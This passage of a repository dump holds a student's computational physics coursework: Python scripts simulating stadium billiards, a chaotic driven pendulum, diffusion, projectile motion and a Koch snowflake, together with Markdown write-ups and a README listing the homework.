label\")\nX1=np.array(L1[0])\nY1=np.array(L1[1])\nZ1=np.array(L1[2])\n#T=np.array(L1[3])\nX2=np.array(L2[0])\nY2=np.array(L2[1])\nZ2=np.array(L2[2])\nax1.plot(X1,Y1,Z1,color='black')\nax1.set_title('r=100')\nax1.set_xlabel('x')\nax1.set_ylabel('y')\nax1.set_zlabel('z')\nax1.view_init(30,0)\nax2.plot(X2,Y2,Z2,color='black')\nax2.set_title('r=100')\nax2.set_xlabel('x')\nax2.set_ylabel('y')\nax2.set_zlabel(\"z\")\nax1.view_init(30,180)\n\nax3.plot(X2,Y2,Z2,color='black')\nax3.set_title('r=100')\nax3.set_xlabel('x')\nax3.set_ylabel('y')\nax3.set_zlabel(\"z\")\nax3.view_init(90,0)\nplt.show()\n " }, { "alpha_fraction": 0.30363160371780396, "alphanum_fraction": 0.37401720881462097, "avg_line_length": 26.340206146240234, "blob_id": "e1566979ec964e366defb7026cf6d5dba3a1a4d7", "content_id": "fcf9d66d3c47a1489bbfdd1b0a42aa9659a1187b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2671, "license_type": "no_license", "max_line_length": 98, "num_lines": 97, "path": "/homework8/code/phasespace3.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,a,X,Y, RR,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n VX=[vx]\n t=[0]\n dt=0.001\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n VX.append(vx)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2 and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n VX.append(vx)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2 and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n cs=x[-1]/d\n 
ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif -a<y[-1]<a and x[-1]>r and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n x[-1]=2*r-x[-1]\n vx=-vx\n x.append(x[-1])\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]<-r and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n x[-1]=-2*r-x[-1]\n vx=-vx\n x.append(x[-1])\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif ((x[-1]-X)**2+((y[-1]-a)-Y)**2)<=RR**2:\n d=math.sqrt((x[-1]-X)**2+(y[-1]-Y)**2)\n d1=2*RR-d\n xx=x[-1]*d1/d\n yy=y[-1]*d1/d\n if (x[-1]*d1/d-Y)**2+(y[-1]*d1/d-Y)**2>=RR**2:\n x.append(xx)\n y.append(yy)#t.append(t[-1]+dt)\n cs=x[-1]/d\n ss=y[-1]/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n elif (x[-1]*d1/d-X)**2+(y[-1]*d1/d-Y)**2<RR**2:\n xx=xx*d1/d\n yy=yy*d1/d\n T=t[-1]\n return x,y,VX\n\n\n\n\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,0.01,0.01,0.2,200)\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,0.001,0.001,0.1,800)\naa=B[0]\nbb=B[1]\ncc=B[2]\n\nV=[]\nxx=[]\nfor i in range(len(B[1])-1):\n if abs(bb[i])<0.001:\n V.append(cc[i])\n xx.append(aa[i])\n \n \nplt.plot(xx,V,'o', ms=2,color='black')\n\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('r=0.1 (0.001,0.001)')\n\n \n \n" }, { "alpha_fraction": 0.37471264600753784, "alphanum_fraction": 0.45195403695106506, "avg_line_length": 25.399999618530273, "blob_id": "839018969a4404115eac44d1f5a90bcbf155b6ba", "content_id": "bd35ba1d22adf47bd459e5ecfde03fbd9f919afe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2175, "license_type": "no_license", "max_line_length": 56, "num_lines": 80, "path": "/homework8/code/a>0.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,a,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n t=[0]\n dt=0.01\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n \n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n cs=x[-1]/d\n ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif -a<y[-1]<a and x[-1]>r:\n x[-1]=2*r-x[-1]\n vx=-vx\n elif -a<y[-1]<a and x[-1]<-r:\n x[-1]=-2*r-x[-1]\n vx=-vx \n T=t[-1]\n return x,y\ndef circle(r1,l1):\n x1=[]\n y1=[]\n theta=[]\n theta.append(0)\n tu=math.pi/10000\n for j in range(10000):\n x1.append(r1*math.cos(theta[-1]))\n y1.append(r1*math.sin(theta[-1])+l1)\n theta.append(theta[-1]+tu)\n theta1=[]\n theta1.append(math.pi) \n for k in range(10000):\n x1.append(r1*math.cos(theta1[-1]))\n y1.append(r1*math.sin(theta1[-1])-l1)\n theta1.append(theta1[-1]+tu)\n return x1,y1\nfig = plt.figure(figsize=(11,5))\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,1000)\nD=billiard(0.5,0.5,-0.4,-0.3,1,0.01,800)\nplt.subplot(1,2,1)\nplt.plot(B[0],B[1],'k:')\na1,b1=circle(1,0.01)\nplt.plot(a1,b1,color='black')\nplt.title('Circular stadium-trajectory')\nplt.xlabel('x')\nplt.ylabel('y')\n\nplt.subplot(1,2,2)\nplt.plot(D[0],D[1],'k:')\na1,b1=circle(1,0.01)\nplt.plot(a1,b1,color='black')\nplt.title('Stasium billiard 
alpha=0.01')\nplt.xlabel('x')\nplt.ylabel('y')\n\n\n \n \n \n \n \n " }, { "alpha_fraction": 0.6401590704917908, "alphanum_fraction": 0.7180914282798767, "avg_line_length": 54.77777862548828, "blob_id": "9f76596cec9dd462af489062f13eb2108d52d7c2", "content_id": "f2a680b537a2ecfabfc2e3e656b30b8dec25a6c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2515, "license_type": "no_license", "max_line_length": 372, "num_lines": 45, "path": "/ch6/Waves: The ideal Case.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Waves: The ideal Case\n\n2015301020090\n\nProblem 6.2\n\n## Backgroud\n\nThe equation of wave motion is \n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{\\partial^{2}y}{\\partial&space;t^2}=c^2\\frac{\\partial^{2}y}{\\partial&space;x^2}\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{\\partial^{2}y}{\\partial&space;t^2}=c^2\\frac{\\partial^{2}y}{\\partial&space;x^2}\" title=\"\\frac{\\partial^{2}y}{\\partial t^2}=c^2\\frac{\\partial^{2}y}{\\partial x^2}\" /></a>\n\nc is the speed with which a wave moves on the string.We use a finitie difference form.Let the displacement of the string is a function of i and n.i and n are correspond to the spatial and time coordinates.We get\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=y(i.n&plus;1)=2[1-r^2]y(i,n)-y(i,n-1)&plus;r^2[y(i&plus;1,n)&plus;y(i-1,n)]\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?y(i.n&plus;1)=2[1-r^2]y(i,n)-y(i,n-1)&plus;r^2[y(i&plus;1,n)&plus;y(i-1,n)]\" title=\"y(i.n+1)=2[1-r^2]y(i,n)-y(i,n-1)+r^2[y(i+1,n)+y(i-1,n)]\" /></a>\n\nr=c*delta-xt/delta-x.\n\nWe set the initial displacement of the string as<a href=\"http://www.codecogs.com/eqnedit.php?latex=y_0(x)=exp[-k(x-x_0)^2]\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?y_0(x)=exp[-k(x-x_0)^2]\" title=\"y_0(x)=exp[-k(x-x_0)^2]\" /></a>\n\n,a \"Gaussian pluck\",where x0=0.3 and x runs from 0 to 1.And the string is held fixed y0(x) prior to t=0.\n\nThe problem we are dealing with involves two step sizes.We should let r=1.Because when r=1 the higher order terms are largely cancelled out.A smaller step is actually less accurate.With our numerical schem the disurbance is propagate one spacial step for each time step.We can't have a disturbance that moves faster.\n\n##\t[Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/ch6.py)\n\n## Results&Analysis\n\n1.r=1\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/1.png)\n\n2.r<1\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/2.png)\n\nTo see it clearly,here's a BIGGER picture:![33](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/33.png)\n\nWe can see that after the reflection from a fixed end there's small blip.Our textbook says it is because the numerical error when r<1\n\n3.r>1\n\n![44](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/44.png)\n\na smaller r:\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/4.png)\n\n\n\n\n\n" }, { "alpha_fraction": 0.5077881813049316, "alphanum_fraction": 0.5514018535614014, "avg_line_length": 15.947368621826172, "blob_id": "ccffb81a0bf705c71ae3837d9bb45595f6fe9601", "content_id": "f07449e50602ce7af8e160ec98a74ecdcef08117", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"Python", "length_bytes": 321, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/final/snowflake1.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import turtle as t\ndef koch(level, size):\n if level == 0:\n t.forward(size)\n return\n else:\n for angle in [60, -120, 60, 0]:\n koch(level-1, size/3)\n t.left(angle)\n\nt.hideturtle()\nt.up()\nt.setx(-t.window_width()/2)\nt.down()\nt.speed(0)\n\nkoch(5,t.window_width())\n\nt.exitonclick()" }, { "alpha_fraction": 0.4715127646923065, "alphanum_fraction": 0.531434178352356, "avg_line_length": 24.230770111083984, "blob_id": "3e5540d44d5240fc15035cd5d27a9e7ddef824c5", "content_id": "6aaa0dea68240092b4ad5a4334ad1bafd3a2ceb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1018, "license_type": "no_license", "max_line_length": 73, "num_lines": 39, "path": "/chaos.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport math\ng=9.8\ndef chaos(theta,l,q,F_D,w_D):\n w=[0]\n Theta=[theta]\n dt=0.01\n i=0\n t=[0]\n T=0\n while T<=100:\n t_i=t[i]\n w_i=w[i]\n theta_i=Theta[i]\n w_dt=w_i-((g/l)*math.sin(theta_i)+q*w_i-F_D*math.sin(w_D*t_i))*dt\n theta_dt=theta_i+w_dt*dt\n while theta_dt>math.pi:\n theta_dt=theta_dt-2*(math.pi)\n while theta_dt<(-math.pi):\n theta_dt=theta_dt+2*(math.pi)\n T=t_i+dt\n w.append(w_dt)\n Theta.append(theta_dt)\n t.append(T)\n i=i+1\n return Theta,t,w\nCH=chaos(0.2,9.8,0.5,1.2,2/3)\n\n#CHo=chaos(0.2,9.8,0.5,0,2/3)\nCH2=chaos(0.3,9.8,0.5,0.5,2/3)\nplt.xlabel('theta/radians')\nplt.ylabel('w/radians/s')\nplt.title('w versus theta')\n\nline1=plt.plot(CH[0],CH[2],label='F_D=1.2',color='black')\n#line2=plt.plot(CHo[1],CHo[0],label='F_D=0',color='red')\n#line3=plt.plot(CH2[0],CH2[2],label='F_D=0.5',color='black')\nplt.legend()\nplt.show()\n \n \n " }, { "alpha_fraction": 0.6590418815612793, "alphanum_fraction": 0.7936987280845642, "avg_line_length": 61.56756591796875, "blob_id": "4c05f105be66afcea8d0a716aff54a06d2b381b8", "content_id": "b24dd243914110a4d6f3a79cf0fe82999977c1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2841, "license_type": "no_license", "max_line_length": 202, "num_lines": 37, "path": "/README.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# computationalphysics_N2015301020090\n姓名:贾雪巍 学号:2015301020090\ntextbook:Computational Physics, Nicholas J. 
Giordano & Hisao Nakanishi\n\n\nHomework List\n=============\n\n## Homework_01: \n> - 推荐安装linux系统(不安装亦可完成本课程学习)\n> - 安装python 2.7运行环境(非linux环境请安装狂蟒之灾)\n> - 注册github账户,建立自己针对计算物理课程的软件池(repository),命名方式compuational_physics_NXXXXXXX(XXXXXXX为个人的学号)所有的源代码和图片应上传到这里\n> - 在这个软件池中按照markdown语法书写自己的第一个README.md,内容主要为你接下来所有作业的链接\n## Homework_02:\n> - 自己用How to think like a computer scientist – Learning with Python: Interactive Edition 2.0进行python语法练习\n> - 编写一个python程序,在屏幕上用字母拼出自己的英文名字(本来想让大家拼自己的中文名字,但对有些同学来说不太公平^_^ )[**作业链接**](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/jiaxuewei%20leisiwole.py)(I'm still working on it!)\n> - 核对自己在2016年秋季计算物理课程学生列表中自己的分班和作业链接是否正确,有问题下次上课一并更正(2016???)\n## [Homework_03](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework_03.md)\n> - 使自己的名字移动\n## [Homewor_04](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch1-1.4.md)\n> - 第一章习题任选一题\n## [Homework_05](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch2.md)\n## [Homework_06](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Baseball.md)\n> - Baseball\n## [Homework_07](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Chaos.md)\n> - Chaos\n## [Homework_08](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/Ch3/lorenz.md)\n> - Lorenz Model\n\n## [Homework_09](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/Chapter_three_chaos_section3.7.md)\n## [Mid-term](https://scratch.mit.edu/projects/185313150/#player)\n## [Homework_10](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/The%20Three-Body%20Problem.md)\nThree body problem\n## [Homework_11](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/CH5/Electric%20Potentials%20.md)\n## [Homework_12](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch6/Waves:%20The%20ideal%20Case.md)\n## [Final project](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/Random%20Systems.md)\n[**Final project_markdown**](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/final/Random%20Systems.md)\n\n\n" }, { "alpha_fraction": 0.6995423436164856, "alphanum_fraction": 0.7478302121162415, "avg_line_length": 80.21794891357422, "blob_id": "ea15556e0a6ea4b8fc262cd96c854c203066c229", "content_id": "520e8cdcb6576bf6a8ef37b4e31dbc81e7708438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6345, "license_type": "no_license", "max_line_length": 1665, "num_lines": 78, "path": "/Chaos.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_three_section3.3\n----------\n贾雪巍2015301020090\n\n## Chaos in the Driven Nonlinear Pendulum\n-------\nProblem 3.12\n\n-----------\n## Background\n-----\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos1.png)\nOne example of a single pendulum is a particle of mass m connected by a massless string to a rigid surpport.We let <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\theta\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\theta\" title=\"\\theta\" /></a>be the angle that the string makes with the vertical and assume that the string is always taut,as in figure.We also assume there are only two forces acting 
on the particle,gravity and the tension of the string.The force perpendicular to the string is given by <a href=\"http://www.codecogs.com/eqnedit.php?latex=F_{\\theta}=-mgsin\\theta\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?F_{\\theta}=-mgsin\\theta\" title=\"F_{\\theta}=-mgsin\\theta\" /></a>.Here we use the **Euler-Cromer method** to solve the problem.And we add some damping to the model.Assume that damping force is proportional to the velocity.Also, consider the addition of a driving force to the problem.A convenient choice is to assume that the driving force is sinusodial with time,with amplitude F_D and angular frequency <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\Omega_D\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\Omega_D\" title=\"\\Omega_D\" /></a>.These lead to the equation of motion <a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{d^2\\theta&space;}{dt^2}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{d^2\\theta&space;}{dt^2}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" title=\"\\frac{d^2\\theta }{dt^2}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}+F_Dsin(\\Omega_Dt)\" /></a>\nl is the length of the string.Rewrite it as two first-order diiferential equation<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{dw&space;}{dt}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{dw&space;}{dt}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}&plus;F_Dsin(\\Omega_Dt)\" title=\"\\frac{dw }{dt}=-\\frac{g}{l}sin\\theta-q\\frac{d\\theta}{dt}+F_Dsin(\\Omega_Dt)\" /></a>,<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{d\\theta&space;}{dt}=w\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{d\\theta&space;}{dt}=w\" title=\"\\frac{d\\theta }{dt}=w\" /></a>.\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos.py)\n---------------------\n## Results&Analysis\n---------------\n1.theta as function of time\nq=0.5,l=g=9.8,theta(0)=0.2,w(0)=0,w_D=2/3\n(parameters in the text book)\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos2.png)\nThe vertical jumps in theater due to resetting of the angle to keep it in the range -pi to pi and thus correspond to the pendulum swinging \"over the top\".\n\n----------\nWithout resetting the angle,F_D=1.2\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos3.png)\nWe see that pendulum does not settle into any sort of repeating steady behavior .\n**At high drive the motion is chaotic!**\nFrom the text book we know that in chaotic condition two pendulum with slightly different initial parameters their difference increased rapidly and irregularly .The diverge exponentially fast.\n \n----\n2.phase-space plot\nOur text book said it is possible to make certain accurate predictions in chaotic conditions by ploting w as function of theta(phase-space).Let's have a try ;-)\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos4.png)\nthe pendulum settles into a regular orbit\n\n-----\nT=100s\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos5.png)\nT=1000s\n![6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/chaos6.png)\n\n(I think there are many horizontal 
lines because of resetting angles from -pi to pi)\n\n3.Poincare section\nThen we plot w versus theta only at times that w_D=2npi,where n is an integer.\n\nfor F_D=0.5,T=100s or T=10000s(same)\n![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/FD%3D0.5.png)\nfor F_D=1.2\n![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/1000s.png)\n\n----------------\n maximum of the drive force,F_D=1.2\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:2.png)\n\n-------------\n pi/4 out-of-phase\n initial theta=0.2\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:4.png)\n initial theta=2\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:4%202.png)\n initial theta=20\n ![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/pi:4%2020.png)\n \n ----------\nIt's not sensitive to the initial value.\n\"special attractor\"?\nThe behavior in the chaotic regime is not completely random,but can be describe by a strange attractor in phase space.\n## Attractor in wikipedia\nIn the mathematical field of dynamical systems, an attractor is a set of numerical values toward which a system tends to evolve, for a wide variety of starting conditions of the system. System values that get close enough to the attractor values remain close even if slightly disturbed.\n\nAn attractor is called strange if it has a fractal structure. This is often the case when the dynamics on it are chaotic, but strange nonchaotic attractors also exist. If a strange attractor is chaotic, exhibiting sensitive dependence on initial conditions, then any two arbitrarily close alternative initial points on the attractor, after any of various numbers of iterations, will lead to points that are arbitrarily far apart (subject to the confines of the attractor), and after any of various other numbers of iterations will lead to points that are arbitrarily close together. 
Thus a dynamic system with a chaotic attractor is locally unstable yet globally stable: once some sequences have entered the attractor, nearby points diverge from one another but never depart from the attractor.\n \n" }, { "alpha_fraction": 0.4920993149280548, "alphanum_fraction": 0.5808879137039185, "avg_line_length": 19.184616088867188, "blob_id": "a4c8eb9118d4bd1cac30c19b7feab6acb1874e2e", "content_id": "a2aeab93fd419576ab6837a96920b051a3e56663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1347, "license_type": "no_license", "max_line_length": 43, "num_lines": 65, "path": "/final/multiparticles.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\n#import numpy as np\nimport matplotlib.pyplot as plt\ndef randpath(n,time):#n number\n initial=[]\n x=[]\n bb=[]\n for i in range(1,2*n):\n x.append(-n+i)\n bb.append(0)\n if i==n:\n initial.append(n)\n else:\n initial.append(0)\n for j in range(n):\n X=[]\n X.append(0) \n for k in range(time): \n c=random.random()\n if c<=0.5:\n X.append(X[-1]+1)\n if c>0.5:\n X.append(X[-1]-1)\n ct=x.index(X[-1])#一个walker最后停止的坐标\n bb[ct]=bb[ct]+1#+1\n if time==0:\n return x,initial\n else:\n return x,bb\nplt.figure(figsize=(12,7))\nax1=plt.subplot(811)\nax2=plt.subplot(812)\nax3=plt.subplot(813)\nax4=plt.subplot(814)\nax5=plt.subplot(815)\nax6=plt.subplot(816)\nax7=plt.subplot(817)\nax8=plt.subplot(818)\nax1.set_title('Diffusion in one dimension')\nplt.sca(ax1)\na,b=randpath(1000,0)\nplt.plot(a,b)\nplt.sca(ax2)\na,b=randpath(1000,10)\nplt.plot(a,b)\nplt.sca(ax3)\na,b=randpath(1000,100)\nplt.plot(a,b)\nplt.sca(ax4)\na,b=randpath(1000,500)\nplt.plot(a,b)\nplt.sca(ax5)\na,b=randpath(1000,1000)\nplt.plot(a,b)\nplt.sca(ax6)\na,b=randpath(1000,2000)\nplt.plot(a,b)\nplt.sca(ax7)\na,b=randpath(1000,4000)\nplt.plot(a,b)\nplt.sca(ax8)\na,b=randpath(1000,8000)\nplt.plot(a,b)\n\nplt.show() \n " }, { "alpha_fraction": 0.7117035984992981, "alphanum_fraction": 0.7871667146682739, "avg_line_length": 38.35714340209961, "blob_id": "1971521f0dda41bc77d3bcb6af7262e5479f3398", "content_id": "efbc6ca52e51935da1e244da69c5e83ad3ea1929", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 311, "num_lines": 56, "path": "/homework8/Chapter_three_chaos_section3.7.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# Chapter_three_chaos_section3.7\n\nProblem 3.31*\n\n## Background\n\nHere we consider the problem of a ball moving without friction on a horizontal table.Imagine there are walls at the edges of table that reflect the ball perfectly and there is no frictional force between the ball and the table.We will ignore any complications associated with the momentum of the ball.\n\nBetween the collisions the motion of the ball is very simple.The key part of the program is the treatment of collisons.The way our textbook recommends can save some work for my computer,but I just took a smaller step at the beginning and then corrected the coordinate by the way I learned from a former student.\n\nIn this section,we take the **table shape** as stadium shape.Imagine a circular table of radius r=1.Cut the table along the x axis and pull the two semicircular halves apart along y axis, a distance 2alpha*r.Then fill in with straight segments.\n\nProblem 3.31 consider a circular interior wall located in the table.\n\n\n\n## 
[Codes](https://github.com/jxw666/computationalphysics_N2015301020090/tree/master/homework8/code)\n\n## Results&Analysis\n\n1.alpha=0&alpha=0.01\n\n---\n\n\n\nTrajectory\n\n![1]( https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/1.png)\n\n The corrosponding phase-space plot(y=0)\n\n![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/2.png)\n\n\n\n2.with a circular interior wall located in the center\n\n---\n\nTrajectory&phase-space plot\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/3.png)\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/4.png)\n\n3.with a circular interior wall located slightly off-center\n\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/5.png)\n\n![6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/6.png)\n![](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/homework8/7.png)\n\n----\n\n When the parameters above are equal to some other value,the plots go crazy!I think the way to solve this is to figure out a better way to deal with the collision.\n\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4972067177295685, "alphanum_fraction": 0.5522745251655579, "avg_line_length": 23.568628311157227, "blob_id": "13f096cdae98ad720675a6bc94924da98b29838d", "content_id": "fd1f83f94c5732b7a6c38c29a79d83e006b61adc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1265, "license_type": "no_license", "max_line_length": 69, "num_lines": 51, "path": "/ch2.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport math\nimport numpy as np\ng=9.8\ndef Trajectory(velocity,angle,Temp):\n velocity_x=[velocity*math.cos(angle)]\n velocity_y=[velocity*math.sin(angle)]\n dt=0.1\n x=[0]\n y=[0]\n i=0\n y_dt=1\n while y_dt>0: \n vxi=velocity_x[i]\n vyi=velocity_y[i]\n v=math.sqrt(vxi**2+vyi**2)\n B=(Temp/300)**2.5*(1-6.5*10**(-3)*y[i]/Temp)**2.5*4*10**(-5)\n vx_dt=vxi-B*v*vxi*dt\n vy_dt=vyi-B*v*vyi*dt-g*dt#g*(6371/(6371+y[i]/1000))**2考虑g的影响时\n x_dt=x[i]+vxi*dt\n y_dt=y[i]+vyi*dt\n if y_dt<0:\n r=-y[-1]/y_dt\n x_dt=(x[-1]+r*x_dt)/(r+1)\n y_dt=0\n range=x_dt\n x.append(x_dt)\n y.append(y_dt)\n velocity_x.append(vx_dt)\n velocity_y.append(vy_dt)\n i=i+1\n return x,y,range\n\nalpha=[]\nRange=[]\nplt.xlabel('x/m')\nplt.ylabel('y/m')\nplt.title('The trajectory of a cannon shell')\nfor i in range(10):\n angle=i*math.pi/20\n t=Trajectory(700,angle,300)\n plt.plot(t[0],t[1])\n #alpha.append(angle)\n #Range.append(t[2]) #to get the maximum range\nplt.xlim(0,30000)\n#plt.plot(np.array(alpha),np.array(Range),'o')\nplt.show()\n#R=max(Range)\n#l=Range.index(R)\n#A=alpha[l]/math.pi*180\n#print(A,R)\n" }, { "alpha_fraction": 0.5411816239356995, "alphanum_fraction": 0.6026795506477356, "avg_line_length": 83.31481170654297, "blob_id": "27d804de340e17a390dc5a1b96782c3320a4cee1", "content_id": "2bed47fdcebd15cc50d42a714b305327754893b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4747, "license_type": "no_license", "max_line_length": 412, "num_lines": 54, "path": "/ch1-1.4.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "> Written with 